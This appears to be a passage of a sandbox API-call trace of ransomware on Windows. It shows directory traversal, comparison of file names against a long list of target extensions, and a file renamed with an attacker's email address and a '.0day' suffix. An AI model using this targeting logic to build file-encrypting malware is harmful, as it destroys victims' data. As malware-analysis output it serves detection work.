nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x10f78, lpOverlapped=0x0) returned 1 [0275.075] WriteFile (hFile=0x394, lpBuffer=0x43f0020, nNumberOfBytesToWrite=0x10f80, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0) Thread: id = 67 os_tid = 0x6ac [0265.440] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x35aba18 [0265.440] lstrlenW (lpString="C:") returned 2 [0265.440] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x3cdfd00 | out: lpFindFileData=0x3cdfd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x35809c0 [0265.441] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0265.441] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0265.441] lstrlenW (lpString="$Recycle.Bin") returned 12 [0265.441] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0265.441] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x41f0048 [0265.441] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0265.441] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x3cdfa84 | out: lpFindFileData=0x3cdfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3580a00 [0265.441] FindNextFileW (in: hFindFile=0x3580a00, lpFindFileData=0x3cdfa84 | out: lpFindFileData=0x3cdfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.441] FindNextFileW (in: hFindFile=0x3580a00, lpFindFileData=0x3cdfa84 | out: lpFindFileData=0x3cdfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x75e61dc0, ftLastAccessTime.dwHighDateTime=0x1d5245c, ftLastWriteTime.dwLowDateTime=0x75e61dc0, ftLastWriteTime.dwHighDateTime=0x1d5245c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0265.441] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0265.441] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0265.441] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0265.441] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0265.441] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x4201058 [0265.442] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0265.442] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x3cdf808 | out: lpFindFileData=0x3cdf808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x75e61dc0, ftLastAccessTime.dwHighDateTime=0x1d5245c, ftLastWriteTime.dwLowDateTime=0x75e61dc0, ftLastWriteTime.dwHighDateTime=0x1d5245c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3580a40 [0265.442] FindNextFileW (in: hFindFile=0x3580a40, lpFindFileData=0x3cdf808 | out: lpFindFileData=0x3cdf808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x75e61dc0, ftLastAccessTime.dwHighDateTime=0x1d5245c, ftLastWriteTime.dwLowDateTime=0x75e61dc0, ftLastWriteTime.dwHighDateTime=0x1d5245c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.442] FindNextFileW (in: hFindFile=0x3580a40, lpFindFileData=0x3cdf808 | out: lpFindFileData=0x3cdf808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x75e61dc0, ftCreationTime.dwHighDateTime=0x1d5245c, ftLastAccessTime.dwLowDateTime=0x75e61dc0, ftLastAccessTime.dwHighDateTime=0x1d5245c, ftLastWriteTime.dwLowDateTime=0x75e61dc0, ftLastWriteTime.dwHighDateTime=0x1d5245c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0265.442] lstrlenW (lpString="desktop.ini") returned 11 [0265.442] lstrlenW (lpString=".1cd") returned 4 [0265.442] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0265.442] lstrlenW (lpString=".3ds") returned 4 [0265.442] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0265.442] lstrlenW (lpString=".3fr") returned 4 [0265.442] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0265.442] lstrlenW (lpString=".3g2") returned 4 [0265.443] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0265.443] lstrlenW (lpString=".3gp") returned 4 [0265.443] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0265.443] lstrlenW (lpString=".7z") returned 3 [0265.443] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0265.443] lstrlenW (lpString=".accda") returned 6 [0265.443] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0265.443] lstrlenW (lpString=".accdb") returned 6 [0265.443] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0265.443] lstrlenW (lpString=".accdc") returned 6 [0265.443] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0265.443] lstrlenW (lpString=".accde") returned 6 [0265.443] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0265.443] lstrlenW (lpString=".accdt") returned 6 [0265.443] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0265.443] lstrlenW (lpString=".accdw") returned 6 [0265.443] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0265.443] lstrlenW (lpString=".adb") returned 4 [0265.443] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0265.443] lstrlenW (lpString=".adp") returned 4 [0265.443] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0265.443] lstrlenW (lpString=".ai") returned 3 [0265.443] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0265.443] lstrlenW (lpString=".ai3") returned 4 [0265.443] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0265.443] lstrlenW (lpString=".ai4") returned 4 [0265.443] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0265.443] lstrlenW (lpString=".ai5") returned 4 [0265.443] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0265.443] lstrlenW (lpString=".ai6") returned 4 [0265.443] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0265.443] lstrlenW (lpString=".ai7") returned 4 [0265.443] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0265.443] lstrlenW (lpString=".ai8") returned 4 [0265.443] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0265.444] lstrlenW (lpString=".anim") returned 5 [0265.444] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0265.444] lstrlenW (lpString=".arw") returned 4 [0265.444] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0265.444] lstrlenW (lpString=".as") returned 3 [0265.444] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0265.444] lstrlenW (lpString=".asa") returned 4 [0265.444] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0265.444] lstrlenW (lpString=".asc") returned 4 [0265.444] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0265.444] lstrlenW (lpString=".ascx") returned 5 [0265.444] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0265.444] lstrlenW (lpString=".asm") returned 4 [0265.444] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0265.444] lstrlenW (lpString=".asmx") returned 5 [0265.444] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0265.444] lstrlenW (lpString=".asp") returned 4 [0265.444] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0265.444] lstrlenW (lpString=".aspx") returned 5 [0265.444] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0265.444] lstrlenW (lpString=".asr") returned 4 [0265.444] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0265.444] lstrlenW (lpString=".asx") returned 4 [0265.444] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0265.444] lstrlenW (lpString=".avi") returned 4 [0265.444] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0265.444] lstrlenW (lpString=".avs") returned 4 [0265.444] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0265.444] lstrlenW (lpString=".backup") returned 7 [0265.444] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0265.444] lstrlenW (lpString=".bak") returned 4 [0265.444] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0265.444] lstrlenW (lpString=".bay") returned 4 [0265.444] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0265.444] lstrlenW (lpString=".bd") returned 3 [0265.444] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0265.445] lstrlenW (lpString=".bin") returned 4 [0265.445] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0265.445] lstrlenW (lpString=".bmp") returned 4 [0265.445] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0265.445] lstrlenW (lpString=".bz2") returned 4 [0265.445] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0265.445] lstrlenW (lpString=".c") returned 2 [0265.445] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0265.445] lstrlenW (lpString=".cdr") returned 4 [0265.445] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0265.445] lstrlenW (lpString=".cer") returned 4 [0265.445] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0265.445] lstrlenW (lpString=".cf") returned 3 [0265.445] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0265.445] lstrlenW (lpString=".cfc") returned 4 [0265.445] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0265.445] lstrlenW (lpString=".cfm") returned 4 [0265.445] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0265.445] lstrlenW (lpString=".cfml") returned 5 [0265.445] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0265.445] lstrlenW (lpString=".cfu") returned 4 [0265.445] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0265.445] lstrlenW (lpString=".chm") returned 4 [0265.445] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0265.445] lstrlenW (lpString=".cin") returned 4 [0265.445] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0265.445] lstrlenW (lpString=".class") returned 6 [0265.445] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0265.445] lstrlenW (lpString=".clx") returned 4 [0265.445] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0265.445] lstrlenW (lpString=".config") returned 7 [0265.445] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0265.445] lstrlenW (lpString=".cpp") returned 4 [0265.445] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0265.445] lstrlenW (lpString=".cr2") returned 4 [0265.446] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".crt") returned 4 [0265.446] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".crw") returned 4 [0265.446] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".cs") returned 3 [0265.446] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0265.446] lstrlenW (lpString=".css") returned 4 [0265.446] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".csv") returned 4 [0265.446] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".cub") returned 4 [0265.446] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".dae") returned 4 [0265.446] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".dat") returned 4 [0265.446] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".db") returned 3 [0265.446] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0265.446] lstrlenW (lpString=".dbf") returned 4 [0265.446] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".dbx") returned 4 [0265.446] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".dc3") returned 4 [0265.446] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".dcm") returned 4 [0265.446] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".dcr") returned 4 [0265.446] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".der") returned 4 [0265.446] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".dib") returned 4 [0265.446] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0265.446] lstrlenW (lpString=".dic") returned 4 [0265.446] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0265.447] lstrlenW (lpString=".dif") returned 4 [0265.447] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0265.447] lstrlenW (lpString=".divx") returned 5 [0265.447] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0265.447] lstrlenW (lpString=".djvu") returned 5 [0265.447] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0265.447] lstrlenW (lpString=".dng") returned 4 [0265.447] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0265.447] lstrlenW (lpString=".doc") returned 4 [0265.447] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0265.447] lstrlenW (lpString=".docm") returned 5 [0265.447] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0265.447] lstrlenW (lpString=".docx") returned 5 [0265.447] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0265.447] lstrlenW (lpString=".dot") returned 4 [0265.447] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0265.447] lstrlenW (lpString=".dotm") returned 5 [0265.447] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0265.447] lstrlenW (lpString=".dotx") returned 5 [0265.447] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0265.447] lstrlenW (lpString=".dpx") returned 4 [0265.447] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0265.447] lstrlenW (lpString=".dqy") returned 4 [0265.447] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0265.447] lstrlenW (lpString=".dsn") returned 4 [0265.447] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0265.447] lstrlenW (lpString=".dt") returned 3 [0265.447] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0265.447] lstrlenW (lpString=".dtd") returned 4 [0265.447] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0265.447] lstrlenW (lpString=".dwg") returned 4 [0265.447] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0265.447] lstrlenW (lpString=".dwt") returned 4 [0265.447] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0265.447] lstrlenW (lpString=".dx") returned 3 [0265.448] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0265.448] lstrlenW (lpString=".dxf") returned 4 [0265.448] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0265.448] lstrlenW (lpString=".edml") returned 5 [0265.448] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0265.448] lstrlenW (lpString=".efd") returned 4 [0265.448] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0265.448] lstrlenW (lpString=".elf") returned 4 [0265.448] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0265.448] lstrlenW (lpString=".emf") returned 4 [0265.448] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0265.448] lstrlenW (lpString=".emz") returned 4 [0265.448] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0265.448] lstrlenW (lpString=".epf") returned 4 [0265.448] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0265.448] lstrlenW (lpString=".eps") returned 4 [0265.448] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0265.448] lstrlenW (lpString=".epsf") returned 5 [0265.448] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0265.448] lstrlenW (lpString=".epsp") returned 5 [0265.448] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0265.448] lstrlenW (lpString=".erf") returned 4 [0265.448] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0265.448] lstrlenW (lpString=".exr") returned 4 [0265.448] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0265.448] lstrlenW (lpString=".f4v") returned 4 [0265.448] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0265.448] lstrlenW (lpString=".fido") returned 5 [0265.448] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0265.448] lstrlenW (lpString=".flm") returned 4 [0265.448] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0265.448] lstrlenW (lpString=".flv") returned 4 [0265.448] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0265.448] lstrlenW (lpString=".frm") returned 4 [0265.448] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0265.449] lstrlenW (lpString=".fxg") returned 4 [0265.449] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0265.449] lstrlenW (lpString=".geo") returned 4 [0265.449] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0265.449] lstrlenW (lpString=".gif") returned 4 [0265.449] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0265.449] lstrlenW (lpString=".grs") returned 4 [0265.449] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0265.449] lstrlenW (lpString=".gz") returned 3 [0265.449] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0265.449] lstrlenW (lpString=".h") returned 2 [0265.449] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0265.449] lstrlenW (lpString=".hdr") returned 4 [0265.449] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0265.449] lstrlenW (lpString=".hpp") returned 4 [0265.449] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0265.449] lstrlenW (lpString=".hta") returned 4 [0265.449] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0265.449] lstrlenW (lpString=".htc") returned 4 [0265.449] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0265.449] lstrlenW (lpString=".htm") returned 4 [0265.449] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0265.449] lstrlenW (lpString=".html") returned 5 [0265.449] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0265.449] lstrlenW (lpString=".icb") returned 4 [0265.449] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0265.449] lstrlenW (lpString=".ics") returned 4 [0265.449] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0265.449] lstrlenW (lpString=".iff") returned 4 [0265.449] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0265.449] lstrlenW (lpString=".inc") returned 4 [0265.449] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0265.449] lstrlenW (lpString=".indd") returned 5 [0265.449] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0265.449] lstrlenW (lpString=".ini") returned 4 [0265.449] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0265.450] FindNextFileW (in: hFindFile=0x3580a40, lpFindFileData=0x3cdf808 | out: lpFindFileData=0x3cdf808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xb0e938c0, ftCreationTime.dwHighDateTime=0x1d5246c, ftLastAccessTime.dwLowDateTime=0xb0e938c0, ftLastAccessTime.dwHighDateTime=0x1d5246c, ftLastWriteTime.dwLowDateTime=0xb0f2be40, ftLastWriteTime.dwHighDateTime=0x1d5246c, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-9C354B42.[my0day@aol.com].0day", cAlternateFileName="DESKTO~1.0DA")) returned 1 [0265.450] lstrlenW (lpString="desktop.ini.id-9C354B42.[my0day@aol.com].0day") returned 45 [0265.450] lstrlenW (lpString=".1cd") returned 4 [0265.450] lstrcmpiW (lpString1=".1cd", lpString2="0day") returned -1 [0265.450] lstrlenW (lpString=".3ds") returned 4 [0265.450] lstrcmpiW (lpString1=".3ds", lpString2="0day") returned -1 [0265.450] lstrlenW (lpString=".3fr") returned 4 [0265.450] lstrcmpiW (lpString1=".3fr", lpString2="0day") returned -1 [0265.450] lstrlenW (lpString=".3g2") returned 4 [0265.450] lstrcmpiW (lpString1=".3g2", lpString2="0day") returned -1 [0265.450] lstrlenW (lpString=".3gp") returned 4 [0265.450] lstrcmpiW (lpString1=".3gp", lpString2="0day") returned -1 [0265.450] lstrlenW (lpString=".7z") returned 3 [0265.450] lstrcmpiW (lpString1=".7z", lpString2="day") returned -1 [0265.450] lstrlenW (lpString=".accda") returned 6 [0265.450] lstrcmpiW (lpString1=".accda", lpString2="].0day") returned -1 [0265.450] lstrlenW (lpString=".accdb") returned 6 [0265.450] lstrcmpiW (lpString1=".accdb", lpString2="].0day") returned -1 [0265.450] lstrlenW (lpString=".accdc") returned 6 [0265.450] lstrcmpiW (lpString1=".accdc", lpString2="].0day") returned -1 [0265.450] lstrlenW (lpString=".accde") returned 6 [0265.450] lstrcmpiW (lpString1=".accde", lpString2="].0day") returned -1 [0265.450] lstrlenW (lpString=".accdt") returned 6 [0265.450] lstrcmpiW (lpString1=".accdt", lpString2="].0day") returned -1 [0265.450] lstrlenW (lpString=".accdw") returned 6 [0265.450] lstrcmpiW (lpString1=".accdw", lpString2="].0day") returned -1 [0265.450] lstrlenW (lpString=".adb") returned 4 [0265.450] lstrcmpiW (lpString1=".adb", lpString2="0day") returned -1 [0265.450] lstrlenW (lpString=".adp") returned 4 [0265.450] lstrcmpiW (lpString1=".adp", lpString2="0day") returned -1 [0265.450] lstrlenW (lpString=".ai") returned 3 [0265.450] lstrcmpiW (lpString1=".ai", lpString2="day") returned -1 [0265.450] lstrlenW (lpString=".ai3") returned 4 [0265.451] lstrcmpiW (lpString1=".ai3", lpString2="0day") returned -1 [0265.451] lstrlenW (lpString=".ai4") returned 4 [0265.451] lstrcmpiW (lpString1=".ai4", lpString2="0day") returned -1 [0265.451] lstrlenW (lpString=".ai5") returned 4 [0265.451] lstrcmpiW (lpString1=".ai5", lpString2="0day") returned -1 [0265.451] lstrlenW (lpString=".ai6") returned 4 [0265.451] lstrcmpiW (lpString1=".ai6", lpString2="0day") returned -1 [0265.451] lstrlenW (lpString=".ai7") returned 4 [0265.451] lstrcmpiW (lpString1=".ai7", lpString2="0day") returned -1 [0265.451] lstrlenW (lpString=".ai8") returned 4 [0265.451] lstrcmpiW (lpString1=".ai8", lpString2="0day") returned -1 [0265.451] lstrlenW (lpString=".anim") returned 5 [0265.451] lstrcmpiW (lpString1=".anim", lpString2=".0day") returned 1 [0265.451] lstrlenW (lpString=".arw") returned 4 [0265.451] lstrcmpiW (lpString1=".arw", lpString2="0day") returned -1 [0265.451] lstrlenW (lpString=".as") returned 3 [0265.451] lstrcmpiW (lpString1=".as", lpString2="day") returned -1 [0265.451] lstrlenW (lpString=".asa") returned 4 [0265.451] lstrcmpiW (lpString1=".asa", lpString2="0day") returned -1 [0265.451] lstrlenW (lpString=".asc") returned 4 [0265.451] lstrcmpiW (lpString1=".asc", lpString2="0day") returned -1 [0265.451] lstrlenW (lpString=".ascx") returned 5 [0265.451] lstrcmpiW (lpString1=".ascx", lpString2=".0day") returned 1 [0265.451] lstrlenW (lpString=".asm") returned 4 [0265.451] lstrcmpiW (lpString1=".asm", lpString2="0day") returned -1 [0265.451] lstrlenW (lpString=".asmx") returned 5 [0265.451] lstrcmpiW (lpString1=".asmx", lpString2=".0day") returned 1 [0265.451] lstrlenW (lpString=".asp") returned 4 [0265.451] lstrcmpiW (lpString1=".asp", lpString2="0day") returned -1 [0265.451] lstrlenW (lpString=".aspx") returned 5 [0265.451] lstrcmpiW (lpString1=".aspx", lpString2=".0day") returned 1 [0265.451] lstrlenW (lpString=".asr") returned 4 [0265.451] lstrcmpiW (lpString1=".asr", lpString2="0day") returned -1 [0265.451] lstrlenW (lpString=".asx") returned 4 [0265.452] lstrcmpiW (lpString1=".asx", lpString2="0day") returned -1 [0265.452] lstrlenW (lpString=".avi") returned 4 [0265.452] lstrcmpiW (lpString1=".avi", lpString2="0day") returned -1 [0265.452] lstrlenW (lpString=".avs") returned 4 [0265.452] lstrcmpiW (lpString1=".avs", lpString2="0day") returned -1 [0265.452] lstrlenW (lpString=".backup") returned 7 [0265.452] lstrcmpiW (lpString1=".backup", lpString2="m].0day") returned -1 [0265.452] lstrlenW (lpString=".bak") returned 4 [0265.452] lstrcmpiW (lpString1=".bak", lpString2="0day") returned -1 [0265.452] lstrlenW (lpString=".bay") returned 4 [0265.452] lstrcmpiW (lpString1=".bay", lpString2="0day") returned -1 [0265.452] lstrlenW (lpString=".bd") returned 3 [0265.452] lstrcmpiW (lpString1=".bd", lpString2="day") returned -1 [0265.452] lstrlenW (lpString=".bin") returned 4 [0265.452] lstrcmpiW (lpString1=".bin", lpString2="0day") returned -1 [0265.452] lstrlenW (lpString=".bmp") returned 4 [0265.452] lstrcmpiW (lpString1=".bmp", lpString2="0day") returned -1 [0265.452] lstrlenW (lpString=".bz2") returned 4 [0265.452] lstrcmpiW (lpString1=".bz2", lpString2="0day") returned -1 [0265.452] lstrlenW (lpString=".c") returned 2 [0265.452] lstrcmpiW (lpString1=".c", lpString2="ay") returned -1 [0265.452] lstrlenW (lpString=".cdr") returned 4 [0265.452] lstrcmpiW (lpString1=".cdr", lpString2="0day") returned -1 [0265.452] lstrlenW (lpString=".cer") returned 4 [0265.452] lstrcmpiW (lpString1=".cer", lpString2="0day") returned -1 [0265.452] lstrlenW (lpString=".cf") returned 3 [0265.452] lstrcmpiW (lpString1=".cf", lpString2="day") returned -1 [0265.452] lstrlenW (lpString=".cfc") returned 4 [0265.452] lstrcmpiW (lpString1=".cfc", lpString2="0day") returned -1 [0265.452] lstrlenW (lpString=".cfm") returned 4 [0265.452] lstrcmpiW (lpString1=".cfm", lpString2="0day") returned -1 [0265.452] lstrlenW 